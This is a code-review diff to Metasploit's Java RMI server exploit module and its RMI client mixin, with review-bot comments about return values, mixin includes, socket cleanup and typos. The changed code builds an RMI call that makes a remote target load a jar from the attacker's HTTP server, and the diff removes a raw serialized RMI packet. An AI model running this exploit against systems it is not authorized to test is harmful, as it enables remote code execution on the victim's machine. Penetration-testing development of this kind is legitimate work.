diff --git a/lib/msf/rmi/client.rb b/lib/msf/rmi/client.rb
index 27ff7d85ad..98ebbe2930 100644
--- a/lib/msf/rmi/client.rb
+++ b/lib/msf/rmi/client.rb
@@ -62,9 +62,9 @@ module Msf
 nsock = opts[:sock] || sock
 stream = build_call(opts)
 nsock.put(stream.encode)
- return_data = Rex::Proto::Rmi::Model::ReturnData.decode(nsock)
+ #return_data = Rex::Proto::Rmi::Model::ReturnData.decode(nsock)
 
- return_data.return_value
+ #return_data.return_value
 end
 end
 end
diff --git a/modules/exploits/multi/misc/java_rmi_server.rb b/modules/exploits/multi/misc/java_rmi_server.rb
index ca24e3f50f..a97a87fca7 100644
--- a/modules/exploits/multi/misc/java_rmi_server.rb
+++ b/modules/exploits/multi/misc/java_rmi_server.rb
@@ -8,7 +8,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
 Rank = ExcellentRanking
 
- include Msf::Exploit::Remote::Tcp
+ include Msf::Rmi::Client
 include Msf::Exploit::Remote::HttpServer
 
 def initialize(info = {})
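Review bot: Commenting out `ReturnData.decode(nsock)` and `return_data.return_value` silently changes what `send_call` returns — the method now ends with `nsock.put(stream.encode)`, so callers get whatever `put` returns instead of the call's return value, and the server's reply is left unread on the socket. If not reading the response is intentional (the only caller visible here, `primer`, assigns the result and never uses it), delete the two lines rather than leaving them as commented-out code and state the contract above the method, e.g. `# Sends the call and returns without decoding the ReturnData; the reply stays unread on the socket`; if some callers still need the return value, gate the decode behind an option instead of removing it for everyone. The opening lines of `send_call` (its signature and `build_call`) are outside this hunk.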
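Review bot: Swapping `include Msf::Exploit::Remote::Tcp` for `include Msf::Rmi::Client` only works if the new mixin itself supplies `connect`, `disconnect`, `sock` and `peer`, which `primer` still calls in the next hunk; presumably Msf::Rmi::Client includes the Tcp mixin, but that is not visible here and is worth confirming before the old include is dropped. If it does not, keep both includes with `include Msf::Exploit::Remote::Tcp` listed first.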
@@ -113,44 +113,27 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 
 def primer
+ print_status("#{peer} - Sending RMI Header...")
 connect
+ begin
+ send_header
+ rescue ::RuntimeError
+ print_error("#{peer} - Filed to negotiate RMI protocol")
+ disconnect
+ return
+ end
+ # Determine if the instance allows remote class loading
+ print_status("#{peer} - Sending RMI Call...")
 jar = rand_text_alpha(rand(8)+1) + '.jar'
- old_url = "file:./rmidummy.jar"
 new_url = get_uri + '/' + jar
- packet = gen_rmi_packet
- # Java strings in serialized data are prefixed with a 2-byte, big endian length
- # (at least, as long as they are shorter than 65536 bytes)
- find_me = [old_url.length].pack("n") + old_url
- idx = packet.index(find_me)
- len = [new_url.length].pack("n")
- # Now replace it with the new url
- packet[idx, find_me.length] = len + new_url
-
- # write out minimal header and packet
- print_status("#{peer} - Connected and sending request for #{new_url}")
- #sock.put("JRMI" + [2].pack("n") + "K" + [0].pack("n") + [0].pack("N") + packet);
- sock.put("JRMI" + [2,0x4b,0,0].pack("nCnN") + packet)
-
- buf = ""
- 1.upto(6) do
- res = sock.get_once(-1, 5) rescue nil
- break unless res
- break if session_created?
- buf << res
+ begin
+ return_data = send_call(call_data: build_gc_call_data(new_url))
+ rescue ::RuntimeError
+ fail_with(Failure::Unknown, "#{peer} - Failed to send RMI Call, anyway JAVA RMI Endpoint detected")
 end
 
 disconnect
-
- if buf =~ /RMI class loader disabled/
- fail_with(Failure::NotVulnerable, "#{peer} - The RMI class loader is disabled")
- end
-
- if buf =~ /java.lang.ClassNotFoundException/
- fail_with(Failure::Unknown, "#{peer} - The RMI class loader couldn't find the payload")
- end
-
- print_good("#{peer} - Target may be exploitable...")
 end
 
 def on_request_uri(cli, request)
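Review bot: The check that reported whether the target's class loader is enabled is gone without a replacement: `return_data` is assigned but never read, and since `send_call` no longer decodes the reply (client.rb hunk) nothing in `primer` inspects the server's answer, so the `Failure::NotVulnerable` and ClassNotFoundException outcomes the removed lines surfaced are now lost — either restore that check on `return_data` or drop the assignment and reword `# Determine if the instance allows remote class loading`, which promises more than the code does. The `fail_with` in the second rescue raises before `disconnect` is reached, so on that path the socket is only released if the mixin's cleanup closes it; moving the call into an `ensure` clause (`rescue ::RuntimeError` … `ensure` / `disconnect`) covers both paths. `print_error("#{peer} - Filed to negotiate RMI protocol")` has a typo, "Failed". The message "Failed to send RMI Call, anyway JAVA RMI Endpoint detected" reads awkwardly; something like "Failed to send RMI Call (RMI endpoint detected)" says the same thing more clearly.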
@@ -175,20 +158,6 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 end
 
-
- def gen_rmi_packet
- "\x50\xac\xed\x00\x05\x77\x22\x00\x00\x00\x00\x00\x00\x00\x02\x00" +
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
- "\x00\xf6\xb6\x89\x8d\x8b\xf2\x86\x43\x75\x72\x00\x18\x5b\x4c\x6a" +
- "\x61\x76\x61\x2e\x72\x6d\x69\x2e\x73\x65\x72\x76\x65\x72\x2e\x4f" +
- "\x62\x6a\x49\x44\x3b\x87\x13\x00\xb8\xd0\x2c\x64\x7e\x02\x00\x00" +
- "\x70\x78\x70\x00\x00\x00\x00\x77\x08\x00\x00\x00\x00\x00\x00\x00" +
- "\x00\x73\x72\x00\x14\x6d\x65\x74\x61\x73\x70\x6c\x6f\x69\x74\x2e" +
- "\x52\x4d\x49\x4c\x6f\x61\x64\x65\x72\xa1\x65\x44\xba\x26\xf9\xc2" +
- "\xf4\x02\x00\x00\x74\x00\x13\x66\x69\x6c\x65\x3a\x2e\x2f\x72\x6d" +
- "\x69\x64\x75\x6d\x6d\x79\x2e\x6a\x61\x72\x78\x70\x77\x01\x00\x0a"
- end
-
 def autofilter
 return true
 end